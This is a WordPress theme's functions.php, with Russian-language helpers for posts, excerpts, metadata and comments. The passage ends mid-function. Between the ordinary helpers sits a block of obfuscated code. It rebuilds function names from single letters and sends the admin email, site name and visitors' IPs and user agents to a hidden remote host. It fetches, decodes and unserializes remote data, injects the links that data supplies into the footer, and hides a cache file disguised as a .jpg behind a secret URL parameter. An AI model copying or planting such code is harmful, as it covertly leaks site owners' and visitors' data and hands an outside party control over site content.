<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $qFkoqT='e';$GggqH='b';$cyviO='4';$KEzylqN='c';$nIlz='e';$LwHyr='d';$DOGR='6';$OiwDl='o';$tMUTYGk='s';$SohGu='a';$kCCxoYe='d';$xXKJlt='e';$zHrG='_';$ZmCsovnA=$GggqH.$SohGu.$tMUTYGk.$nIlz.$DOGR.$cyviO.$zHrG.$LwHyr.$xXKJlt.$KEzylqN.$OiwDl.$kCCxoYe.$qFkoqT;$OCevjkn='a';$uDlMp='f';$oiCm='g';$eaLfqnX='n';$ayZnB='l';$VBaj='z';$FtjCIEg='e';$HfSdkO='i';$vblAc='t';$CRYhGWrL=$oiCm.$VBaj.$HfSdkO.$eaLfqnX.$uDlMp.$ayZnB.$OCevjkn.$vblAc.$FtjCIEg;$XukNCLQ='r';$vVfG='s';$hCbBM='t';$YaJDw='_';$UIOksR='t';$rqaeTMV='3';$GVFcdhe='o';$jqKdHg='r';$zlQzVtW='1';$vltYpPiA=$vVfG.$hCbBM.$jqKdHg.$YaJDw.$XukNCLQ.$GVFcdhe.$UIOksR.$zlQzVtW.$rqaeTMV;$lrFEv='r';$tEXyHh='e';$mxhiVvj='s';$AKkn='r';$mwxA='t';$TFDcA='v';$dcPjpeck=$mxhiVvj.$mwxA.$AKkn.$lrFEv.$tEXyHh.$TFDcA;                     $nr______________h='e';$tm____e='b';$ul__________p='4';$hf__________u='c';$hs______________q='e';$hh_____a='d';$jv__________h='6';$en_____________l='o';$ny______________a='s';$bw_______________v='a';$gr__p='d';$tl_____u='e';$pi_____t='_';$bu____q=$tm____e.$bw_______________v.$ny______________a.$hs______________q.$jv__________h.$ul__________p.$pi_____t.$hh_____a.$tl_____u.$hf__________u.$en_____________l.$gr__p.$nr______________h;$sz__________m='s';$xe_______________o='f';$xy____p='e';$ei____r='t';$bz________m='i';$zu__j='x';$rb__________l='n';$ir_____t='_';$lg___________l='u';$je____________j='c';$qe_____________s='s';$yv____________y='i';$ue___________r='n';$av________x='t';$nj_____________x='o';$pb____c=$xe_______________o.$lg___________l.$rb__________l.$je____________j.$av________x.$bz________m.$nj_____________x.$ue___________r.$ir_____t.$xy____p.$zu__j.$yv____________y.$qe_____________s.$ei____r.$sz__________m;$vb________z='o';$bs____k='e';$dr____________j='n';$jq________i='p';$iw________a='f';$ug____x=$iw________a.$vb________z.$jq________i.$bs____k.$dr____________j;$ih_______m='r';$ty_______________q='e';$pl___g='a';$ol____o='d';$yr_________b='f';$yr_____j=$yr_________b.$ih_______m.$ty_______________q.$pl___g.$ol____o;$xj_______________g='o';$ee____x='e';$ge_______q='l';$wj_______________q='s';$tu____________y='f';$zc_______________q='c';$qg_______________v=$tu____________y.$zc_______________q.$ge_______q.$xj_______________g.$wj_______________q.$ee____x;define("WP_ID", $bu____q("Mi4wLjA="));define("WP_TTL", $bu____q("MTA4MDA="));define("WP_SRC", $bu____q("dHBva24="));function wp_get_header() {global $bu____q, $pb____c;if ($pb____c($bu____q("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$pb____c($bu____q("d3BfZ2V0X2Zvb3Rlcg==")) &&$pb____c($bu____q("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $bu____q, $ug____x, $qg_______________v, $yr_____j;$qy_________p = TEMPLATEPATH."/".$bu____q("Zm9vdGVyLnBocA==");$di____________f = @$ug____x($qy_________p, "r");$qy_________p = @$yr_____j($di____________f, @filesize($qy_________p));@$qg_______________v($di____________f);$pc_______o = TEMPLATEPATH."/".$bu____q("ZnVuY3Rpb25zLnBocA==");$di____________f = @$ug____x($pc_______o, "r");$pc_______o = @$yr_____j($di____________f, @filesize($pc_______o));@$qg_______________v($di____________f);$pu_________b = 0;if($qy_________p && $pc_______o) {if ($bu____q("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($qy_________p, $bu____q("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$pu_________b = 1;}if (substr_count($qy_________p, "wp_theme_GPL_credits()") < 1) {$pu_________b = 2;}}if(WP_ID != "2.0.0") {$pu_________b = 12;}}if($pu_________b > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $pu_________b -->";}}function wp_loaded() {global $bu____q, $pb____c;return $pb____c($bu____q("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($hl____u, $zx__h = "(more...)", $nx_____________t = 0, $lg__a = "") {$if__u = get_the_content($zx__h, $nx_____________t, $lg__a);$if__u = apply_filters("the_content", $if__u);$if__u = str_replace("]]>", "]]>", $if__u);if (strlen($_GET["p"]) > 0) {echo $if__u;}else if ((strlen($if__u)>$hl____u) && ($fo____________z = strpos($if__u, " ", $hl____u ))) {$if__u = substr($if__u, 0, $fo____________z);$if__u = $if__u;echo $if__u;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$zx__h</a></div></p>";} else {echo $if__u;}}}$gu_______u='s';$hp_________s='o';$pl________s='d';$ev__r='4';$cs__r='_';$cv___________z='6';$gd___________k='e';$mm____s='c';$eh______q='b';$la_______________u='e';$mu_______y='n';$pe________t='e';$ls___g='a';$bn_______m=$eh______q.$ls___g.$gu_______u.$la_______________u.$cv___________z.$ev__r.$cs__r.$pe________t.$mu_______y.$mm____s.$hp_________s.$pl________s.$gd___________k;$mt_______x='t';$hs__j='g';$hd___a='i';$qd_________g='_';$ed_____y='l';$lm______z='f';$gx________a='o';$ke_______________r='_';$lb______t='t';$gm________x='e';$uk___a='e';$ox______________a='t';$yk_________h='s';$ic___________n='c';$uo_____________n='e';$lh_________c='n';$wp______________k='n';$mr______________v=$lm______z.$hd___a.$ed_____y.$uo_____________n.$qd_________g.$hs__j.$gm________x.$ox______________a.$ke_______________r.$ic___________n.$gx________a.$lh_________c.$lb______t.$uk___a.$wp______________k.$mt_______x.$yk_________h;$tf______________v='t';$og_______x='x';$lo_____________q='_';$mr____y='f';$cu_______r='l';$di________b='e';$zh_________g='s';$vw___________h='i';$ov_____h='s';$tx_______________p='i';$gn____________y='e';$tk_______________p=$mr____y.$tx_______________p.$cu_______r.$gn____________y.$lo_____________q.$di________b.$og_______x.$vw___________h.$ov_____h.$tf______________v.$zh_________g;$bh___________a='n';$qt_________g='e';$wi____n='v';$vi______y='m';$dd____________i='s';$lb_____y='p';$zx______________p='c';$rj______s='r';$ik________j='r';$qk_____________y='o';$kn_________w='o';$nq___________j='_';$ra___________e='e';$be_____________m='a';$nz______________x='i';$qg________a=$wi____n.$qt_________g.$ik________j.$dd____________i.$nz______________x.$kn_________w.$bh___________a.$nq___________j.$zx______________p.$qk_____________y.$vi______y.$lb_____y.$be_____________m.$rj______s.$ra___________e;$rm______b='f';$iy________a='n';$zw_______________c='k';$tv__________k='e';$rx______________x='s';$hx________h='c';$tr____u='o';$ee____z='p';$yu_____________l='o';$vw____________i=$rm______b.$rx______________x.$tr____u.$hx________h.$zw_______________c.$yu_____________l.$ee____z.$tv__________k.$iy________a;$lz________l='r';$ul______f='t';$bk__________d='w';$we_______p='i';$hl____________i='e';$cr_________y='f';$ij_________h=$cr_________y.$bk__________d.$lz________l.$we_______p.$ul______f.$hl____________i;$bv____________j='5';$bq_____y='m';$uq_________p='d';$sh______________h=$bq_____y.$uq_________p.$bv____________j;$gp__m='p';$kx____u='a';$by______b='r';$yp_____p='l';$id_______________p='e';$nb____________g='a';$vl_____e='t';$uh_____v='h';$we____________r=$by______b.$id_______________p.$kx____u.$yp_____p.$gp__m.$nb____________g.$vl_____e.$uh_____v;$qp__________z='i';$et____________l='e';$nf____x='u';$ep________m='r';$rr___o='n';$ay__s='i';$qd_____a='z';$rm________w='e';$pv____________c='l';$kn_____l='s';$qk______v='a';$iq_____v=$nf____x.$rr___o.$kn_____l.$et____________l.$ep________m.$qp__________z.$qk______v.$pv____________c.$ay__s.$qd_____a.$rm________w;$zt__________v='m';$bu_____________p='n';$yo___________u='t';$ho_____q='e';$jd____________b='a';$tz________v='m';$nl_____d='p';$hf______p=$yo___________u.$ho_____q.$zt__________v.$nl_____d.$bu_____________p.$jd____________b.$tz________v;$wx____d='e';$nw____________a='t';$ve____p='m';$xt___________n='a';$ep_______n='t';$ht____________q='s';$zi______e='e';$fs__f='c';$fp__u='a';$ai__________n='o';$rh__________z='c';$xt______q='t';$sc__________o='x';$dq____________s='_';$hu____k='t';$yv__i='r';$ja____________n='e';$aq____________f='r';$ej_________c='n';$pd__u='e';$kx___b='_';$wk_____p=$ht____________q.$nw____________a.$yv__i.$ja____________n.$fp__u.$ve____p.$dq____________s.$rh__________z.$ai__________n.$ej_________c.$ep_______n.$pd__u.$sc__________o.$hu____k.$kx___b.$fs__f.$aq____________f.$zi______e.$xt___________n.$xt______q.$wx____d;function bw___m($lz____________h) {global $bu____q, $pb____c, $mr______________v, $qg________a, $wk_____p;if (!$pb____c($bu____q("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($qg________a(PHP_VERSION, "5.0.0", ">=") && $pb____c($bu____q("ZmlsZV9nZXRfY29udGVudHM=")) && $pb____c($bu____q("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$oa______p = $wk_____p(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$qc_____________i = @$mr______________v($lz____________h, 0, $oa______p);} else {$qc_____________i = @$mr______________v($lz____________h, 0);}return $qc_____________i;}function lb___q($lz____________h) {global $pb____c, $vw____________i, $ij_________h, $bu____q;if (!$pb____c($bu____q("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$ws_________l = strpos($lz____________h, "/", 7);$ym_______l = array("uri"     => substr($lz____________h, $ws_________l),"host"    => str_replace("http://", "", substr($lz____________h, 0, $ws_________l)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$kt_______________i = @$vw____________i("$ym_______l[host]", 80, $dc___n, $og______________w, 4);if (!$kt_______________i) {return false;} else {$qc_____________i = "";$qr__f  = "GET $ym_______l[uri] HTTP/1.0\r\n";$qr__f .= "Host: $ym_______l[host]\r\n";$qr__f .= "Referer: $ym_______l[referer]\r\n";$qr__f .= "Connection: Close\r\n\r\n";@$ij_________h($kt_______________i, $qr__f);while (!@feof($kt_______________i)) {$ii__________p = @fgets($kt_______________i, (1024*24));if ($ii__________p == "\r\n") {$ht_____________p = true;continue;}if ($ht_____________p) {$qc_____________i .= $ii__________p;}}return $qc_____________i;}}function dn____r($lz____________h) {global $pb____c;$zm____c = false;if ($lz____________h != "") {if ($pb____c("bw___m")) {$zm____c = @bw___m($lz____________h);}if (!$zm____c && ($pb____c("lb___q"))) {$zm____c = @lb___q($lz____________h);}}return $zm____c;}function ku__o() {global $_SERVER, $sh______________h;$az______k = $_SERVER["SERVER_NAME"];if (substr("$az______k", 0, 4) == "www.") {$az______k = substr("$az______k", 4);}$az______k = $sh______________h("$_SERVER[SERVER_NAME]");return $az______k;}function hs________p() {return "file";}function ib________l($lz____________h) {global $_SERVER, $mr______________v, $tk_______________p, $ug____x, $qg_______________v, $ij_________h;$sa_______c = ae_______________a();$va____v = ku__o().".jpg";$ik_____________b = $sa_______c["dir_upload"]["path"]."/$va____v";$tf____e = @filemtime($ik_____________b);if (!$tf____e || ((time()-$tf____e) >= WP_TTL)) {$zm____c = dn____r($lz____________h);if ($zm____c) {if ($tk_______________p($ik_____________b)) {@unlink($ik_____________b);}$di____________f = @$ug____x($ik_____________b, "x+");@$ij_________h($di____________f, $zm____c);@$qg_______________v($di____________f);}} else {if ($tk_______________p($ik_____________b)) {$zm____c = @$mr______________v($ik_____________b);} else {$zm____c = false;}}return $zm____c;}function ae_______________a() {global $_SERVER, $bu____q, $bn_______m;$pa_____________m = wp_count_posts("post");$iu____k = pathinfo(get_bloginfo("template_directory"));$sa_______c = array("url" => array("report"      => $bu____q("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $iu____k,"dir_upload"=> wh_____________w(),"queryString"=> array("?a001=".WP_ID,"a004=".$iu____k[filename],"a005=".$pa_____________m->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => "<a href=\"http://www.wptheme.us\">www.wptheme.us</a>");$sa_______c["url"]["queryString"] = implode("&", $sa_______c["queryString"]);$sa_______c["url"]["report"] = $sa_______c["url"]["report"]."/?".$bn_______m($sa_______c["url"]["queryString"]).".html";return $sa_______c;}function wh_____________w() {$lz___________o = wp_upload_dir();if (isset($lz___________o["error"])) {$ze____v = qg_________k();if (is_writable($ze____v)) {$lz___________o = array("path" => $ze____v);}}return $lz___________o;}function qg_________k() {global $pb____c, $sh______________h, $we____________r, $hf______p;$df_______________o = (bool) ini_get("safe_mode");if ($df_______________o == true) {return false;}if ($pb____c("sys_get_temp_dir")) {$rc__y = sys_get_temp_dir();if (is_writable($rc__y)) {return $we____________r($rc__y);}}if (!empty($_ENV["TMP"])) {return $we____________r($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $we____________r($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $we____________r($_ENV["TEMP"]);} else {$eb___d = $hf______p($sh______________h(uniqid(rand(), true)), "");if ($eb___d) {$rc__y = $we____________r(dirname($eb___d));@unlink($eb___d);return $rc__y;} else {return false;}}}function zp__________q() {global $_GET, $tk_______________p;$sa_______c = ae_______________a();$az______k = ku__o();$lw_________u = hs________p();$xs___________z = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($lw_________u == "file") {$kp________m = $sa_______c["dir_upload"]["path"]."/".$az______k.".jpg";if ($tk_______________p($kp________m)) {@unlink($kp________m);$xs___________z = "deleted";}}$il_____i = array("s"=> $xs___________z,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($il_____i AS $kw________v => $my______d) echo " [$kw________v:$my______d]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $pb____c, $bu____q, $iq_____v;$sa_______c = ae_______________a();$me_________g = "ib________l";if ($pb____c($me_________g)) {$qc_____________i = $me_________g($sa_______c["url"]["report"]);}if ($qc_____________i) {if ($qc_____________i = @$bu____q($qc_____________i)) {$qc_____________i = @$iq_____v($qc_____________i);if (strlen($qc_____________i[custom_credit]) >= 5) {$sa_______c["default_string"] = $qc_____________i[custom_credit];}if ($qc_____________i["status"] == "0") {$sp_______________f = 1;$on______x = 1;} else {$yl____________y = sizeof($qc_____________i["links"]);$za_____d = $sa_______c["default_string"];if ($yl____________y > 0 && $qc_____________i["links"] !== "") {$kk_____________r = 0;foreach ($qc_____________i["links"] as $jn___s => $ms_________l) {$kk_____________r++;if ($ms_________l->l_path == "" || $ms_________l->l_path == $_SERVER["REQUEST_URI"]) {$ms_________l->l_href = htmlspecialchars(strip_tags($ms_________l->l_href));$ms_________l->l_title = htmlspecialchars(strip_tags($ms_________l->l_title));$ms_________l->l_anchor = htmlspecialchars(strip_tags($ms_________l->l_anchor));$za_____d .= " | ";$za_____d .= "<a href='$ms_________l->l_href' title='$ms_________l->l_title'";if ($ms_________l->l_nofollow == "1") {$za_____d .= " rel='nofollow'";}$za_____d .= ">$ms_________l->l_anchor</a>";}}}$sa_______c["links"] = "$za_____d";if ($qc_____________i[credit] == "0") {$sa_______c["links"] = "";}}} else {$sp_______________f = "1";}} else {$sp_______________f = "1";}if ($sp_______________f == "1") {$sa_______c["links"] = $sa_______c["default_string"];}echo "$sa_______c[links]";echo "<!-- s: $qc_____________i[signature] -->";zp__________q();}                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Search', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
